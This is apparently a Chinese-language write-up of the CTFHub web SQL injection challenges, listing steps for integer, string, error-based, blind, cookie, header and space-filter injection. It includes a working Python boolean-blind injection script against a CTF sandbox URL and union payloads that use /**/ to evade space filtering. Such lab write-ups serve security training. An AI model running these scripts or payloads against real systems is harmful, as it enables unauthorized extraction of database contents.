CTFHub Web SQL注入

1.整型注入

输入1 and 1=1 显示正常

order by判断字段得到字段数为2

union联合查询即可

查询表名

查询字段名

查询数据

得到flag

2.字符型注入

方法同整形注入，只需考虑 ' 的闭合即可

3.报错注入

输入1显示正常

输入1 ' 报错并显示报错信息

可使用报错注入

查询数据库名

查询表名

查询字段名

查询数据

发现有长度限制，flag显示不全
用right函数显示剩下的内容

即可得到flag

4.布尔盲注

import requests

urlOPEN = 'http://challenge-31978e19f23c2c9c.sandbox.ctfhub.com:10080/?id='
starOperatorTime = []
mark = 'query_success'
def database_name():
    name = ''
    for j in range(1,9):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
            r = requests.get(url)
            if mark in r.text:
                name = name+i
                print(name)
                break
    print('database_name:',name)
database_name()
def table_name():
    list = []
    for k in range(0,4):
        name=''
        for j in range(1,9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                r = requests.get(url)
                if mark in r.text:
                    name = name+i
                    break
        list.append(name)
    print('table_name:',list)

table_name()

 
def column_name():
    list = []
    for k in range(0,3): #判断表里最多有4个字段
        name=''
        for j in range(1,9): #判断一个 字段名最多有9个字符组成
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+i
                    break
        list.append(name)
    print ('column_name:',list)
 
column_name()
 
def get_data():
        name=''
        for j in range(1,50): #判断一个值最多有51个字符组成
            for i in range(48,126):
                url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+chr(i)
                    print(name)
                    break
        print ('value:',name)
    
get_data()

5.时间盲注

使用sqlmap

6.cookie注入

7.过滤空格

仅需把空格替换为/**/即可

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='rwlxtxnndq'

-1/**/union/**/select/**/1,qbovxtciha/**/from/**/rwlxtxnndq

8.UA注入

使用sqlmap

9.Referer注入

最后编辑于：2020.10.03 10:48:53